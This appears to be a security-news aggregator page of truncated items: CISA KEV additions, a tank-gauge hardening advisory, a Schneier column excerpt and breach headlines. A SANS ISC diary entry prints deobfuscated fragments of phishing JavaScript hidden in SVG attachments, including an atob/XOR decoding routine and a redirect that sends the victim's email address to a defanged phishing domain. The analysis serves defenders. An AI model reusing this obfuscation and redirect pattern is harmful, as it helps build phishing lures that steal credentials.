Miami Beach, FL, USA, 2nd June 2026, CyberNewswire
Security & IT News
Real-time news from 13+ trusted sources — BleepingComputer, The Hacker News, Krebs on Security, Dark Reading & more.
CISA has added two new vulnerabilities to its Known Exploited Vulnerabilities (KEV) Catalog (https://www.cisa.gov/known-exploited-vulnerabilities-catalog), based on evidence of active exploitation.
- CVE-2022-0492 (https://www.cve.org/CVERecord?id=CVE-2022-0492): Linux Kernel Improper Authentication Vulnerability
- CVE-2025-48595 (https://www.cve.org/CVERecord?id=CVE-2025-48595): Android Framework Integer Overflow Vulnerability
These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risks to the federal enterprise.
Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities (https://www.cisa.gov/binding-operational-directive-22-01) established the KEV Catalog as a living list of known Common Vulnerabilities and Exposures (CVEs) that carry significant risk to the federal enterprise. BOD 22-01 requires Federal Civilian Executive Branch (FCEB) agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the BOD 22-01 Fact Sheet (https://www.cisa.gov/sites/default/files/publications/Reducing_the_Significant_Risk_of_Known_Exploited_Vulnerabilities_211103.pdf) for more information.
Although BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of KEV Catalog vulnerabilities (https://www.cisa.gov/known-exploited-vulnerabilities-catalog) as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the catalog that meet the specified criteria (https://www.cisa.gov/known-exploited-vulnerabilities).
CISA and Partners Urge Hardening Automatic Tank Gauge Systems (https://www.cisa.gov/sites/default/files/2026-06/fact-sheet-cisa-and-partners-urge-hardening-automatic-tank-gauge-systems_508c.pdf)
Overview
The Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), the National Security Agency (NSA), the Department of Energy (DOE), the Environmental Protection Agency (EPA), the Transportation Security Administration (TSA), the Department of Transportation (DOT), and the U.S. Department of Agriculture (USDA)—hereafter referred to as “the authoring organizations”—are aware of malicious cyber activity targeting U.S.-based automatic tank gauge (ATG) systems. ATG systems are widely used throughout the Energy (https://www.cisa.gov/topics/critical-infrastructure-security-and-resilience/critical-infrastructure-sectors/energy-sector), Chemical (https://www.cisa.gov/topics/critical-infrastructure-security-and-resilience/critical-infrastructure-sectors/chemical-sector), Food and Agriculture (https://www.cisa.gov/topics/critical-infrastructure-security-and-resilience/critical-infrastructure-sectors/food-and-agriculture-sector), and Transportation Systems (https://www.cisa.gov/topics/critical-infrastructure-security-and-resilience/critical-infrastructure-sectors/transportation-systems-sector) Sectors for automated and remote monitoring of storage tank parameters, including fuel and liquid levels, temperature, and possible leak detection. The authoring organizations urge ATG owners and operators to defend against this malicious activity by securing their ATG systems with strong passwords and by removing them from the internet to reduce public exposure.
Threat
The recent malicious cyber activity observed by the authoring organizations—which the U.S. government has not yet attributed to a nation-state or threat actor group—involves cyber threat actors compromising internet-exposed ATG systems and subsequently modifying them through command execution. This fact sheet provides insight into probable tactics, techniques, and procedures (TTPs) leveraged by these cyber actors, highlights risk factors associated with such compromises, and provides mitigation guidance and resources to reduce the likelihood of continued malicious activity targeting U.S.-based ATG systems.
Cyber threat actors may exploit flaws in ATG systems through multiple attack vectors:
- Authentication Bypass and Hardcoded Credentials: Threat actors gain unauthorized access to device management interfaces.
- OS Command Execution and Structured Query Language (SQL) Injection: Threat actors execute arbitrary code and manipulate underlying databases.
- Privilege Escalation: Threat actors achieve full administrator privileges over the device applicat
AI-driven exploitation timelines are rapidly shrinking, and they are not going to stop shrinking. Vulnerabilities are being discovered, reproduced, and weaponized faster than ever in the history of enterprise security. As a result, the window between a vulnerability being disclosed and indiscriminate exploitation observed across the internet is now measured in hours, not days. The industry's
Google has released the June 2026 Android security patches to address 124 vulnerabilities, including one zero-day flaw exploited in targeted attacks. [...]
As part of their 20th Anniversary celebration, Dark Reading asked five cybersecurity industry leaders who wrote blogs or columns for them over the years to select their favorite piece and share their reflections on the topic today. This is my section. Renowned technologist and author Bruce Schneier contributed a column on June 20, 2010, warning about cryptography’s inability to secure modern networks, a point he says he has been trying to argue since 2000. “For a while now, I’ve pointed out that cryptography is singularly ill-suited to solve the major network security problems of today: denial-of-service attacks, website defacement, theft of credit card numbers, identity theft, viruses and worms, DNS attacks, network penetration, and so on. “Recently, I talked to a former NSA employee at a conference. He told me that back in the 1990s, he had a copy of my book Applied Cryptography by his desk, as did many other cryptographers working at Ft. Meade. People were allowed to refer to it, but they were not allowed to cite it. “The 1990s were an important decade for cryptography. This was before the internet went mass market, when cryptography was just emerging from a niche academic discipline to a mainstream engineering one. There wasn’t much that programmers could read. The NSA used my book for the same reason it became a bestseller: because it collected all the academic cryptography of the time in one place and made it understandable to people who weren’t mathematicians. They feared it for exactly the same reason. “I’ve been thinking about that conversation as I revisit a 2010 essay I wrote for Dark Reading, ‘The Failure of Cryptography to Secure Modern Networks.’ Cryptography has inherent mathematical properties that greatly favor the defender. Adding a single bit to the length of a key adds only a slight amount of work for the defender but doubles the amount of work the attacker has to do. 
Doubling the key length doubles the amount of work the defender has to do (if that—I’m being approximate here) but increases the attacker’s workload exponentially. For many years, we have exploited that mathematical imbalance. “Computer security is much more balanced. There’ll be a new attack, and a new defense, and a new attack, and a new defense. It’s an arms race between attacker and defender. And it’s a very fast arms race. New vulnerabilities are discovered all the time. The balance can tip from defender to attacker overnight, and back again the night after. Computer security defenses are inherently very fragile. “That isn’t a new idea. I said much the same thing in the preface to my 2000 book, Secrets and Lies: “‘Cryptography is a branch of mathematics. And like all mathematics, it involves numbers, equations, and logic. Security, real security that you or I might find useful in our lives, involves people: things people kno
An anonymous security researcher called “Nightmare Eclipse” has been publishing a series of significant security exploits against Microsoft Windows—including one that breaks BitLocker. Microsoft has threatened legal action against the researcher. Lots of recriminations are being traded back and forth.
A threat actor used AI coding tools to build and test EDR evasion malware, Sophos finds
Most organizations now recognize that endpoint protection alone is no longer sufficient. That's why adoption of endpoint detection and response (EDR) has accelerated rapidly in recent years. Organizations understand that modern attacks move faster, evade traditional prevention controls, and require continuous visibility into suspicious activity across the environment. But owning EDR
Attackers backdoored 32 packages in Red Hat's official npm scope to steal cloud and CI secrets
UK organizations are prioritizing AI-driven cybersecurity as 43% cite AI-powered attacks as their top risk, prompting significant investment in advanced threat defense
Cybersecurity researchers have disclosed details of a spear-phishing campaign likely undertaken by the Pakistan-aligned SideCopy group targeting Afghanistan's Ministry of Finance with an open-source remote access trojan called Xeno RAT. "The campaign opens with a spear phishing delivery - a ZIP archive containing a malicious LNK file bearing a carefully crafted Pashto-language filename,"
A new Silobreaker and SANS Institute paper examines the ‘Intelligence-Stakeholder Gap’ and what organizations must do to achieve business buy-in on threat intelligence
For a few days, my SANS ISC mailbox has been flooded with emails that deliver SVG files. An SVG (Scalable Vector Graphic) is a web-friendly vector file format used for graphics and icons. No URL in the body, just an image: that's the perfect way to deliver some malicious content. This isn't the first time that we see this technique used by threat actors[1]. This time, the SVG files are really simple and don't even contain any graphical element, just a simple piece of JavaScript that will redirect the victim's browser to the phishing page:
With the current wave, I just detected regular phishing pages but it could be any payload. The variable nl contains the targeted email address:
    nl = '$aGFuZGxlcnNAc2Fucy5lZHU='; // [email protected]
The interesting payload is in oa; it contains a Base64-encoded and XOR'd string. The XOR key is in bd:
    const pt = "b19208caeefa";
    const rm = "51d1e7dcd384";
    const bd = pt + rm;
The payload is decoded here:
    const cx = ['b', 'style', 'o', 't', 'a'];
    const kf = self[[cx[4], cx[3], cx[2], cx[0]].join('')]; // resolves to self.atob
    const ts = kf(oa);
    const rabbit = Uint8Array.from(ts, (aa, ak) => aa.charCodeAt(0) ^ bd.charCodeAt(ak % bd.length));
Finally, the variable rabbit is used to perform the redirect in the browser:
    window.location.href = hxxps://chinougoo[.]cfd/W74rH61S!x7sbhhS0bKPv/ + [email protected] ;
This technique works because SVG files are handled by the browser by default on the Windows operating system. Note the TLD used (.cfd), which means Clothing, Fashion, and Design. It's a cheap TLD more and more abused in phishing campaigns[2]. A final note about the MIME type used in the SVG file:
    <script type="application/ecmascript">
This is an official MIME type for ECMAScript, the standardized specification underlying JavaScript (standard ECMA-262)[3]. This has probably been used to defeat some common security controls that are looking for JavaScript.
[1] https://isc.sans.edu/diary/Increase+In+Phishing+SVG+Attachments/31456
[2] https://radar.cloudflare.com/tlds/cfd?dateRange=7d
[3] https://github.com/sudheerj/ECMAScript-features
Xavier Mertens (@xme), Xameco, Senior ISC Handler - Freelance Cyber Security Consultant
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Password manager Dashlane has disclosed that "fewer than" 20 users on the personal subscription plan had their encrypted vaults downloaded following a brute-force attack launched by an unknown party. On May 31, 2026, the company said an "external" threat actor launched a brute-force attack against certain Dashlane user accounts with the aim of breaking two-factor authentication (2FA)
Consider the history of any recent corporate scandal, and it is quite possible to guess what the story…
A threat actor tracked as DriveSurge has been operating large-scale malware distribution campaigns using ClickFix and FakeUpdates techniques on compromised sites. [...]
More than 30 npm packages under Red Hat's '@redhat-cloud-services' namespace were compromised in a supply-chain attack that distributed a new variant of the Shai-Hulud credential-stealing malware, dubbed "Miasma." [...]
The Spanish National Police has arrested an individual for leaking sensitive information related to members of various key state organizations, including the National Cybersecurity Institute (INCIBE). [...]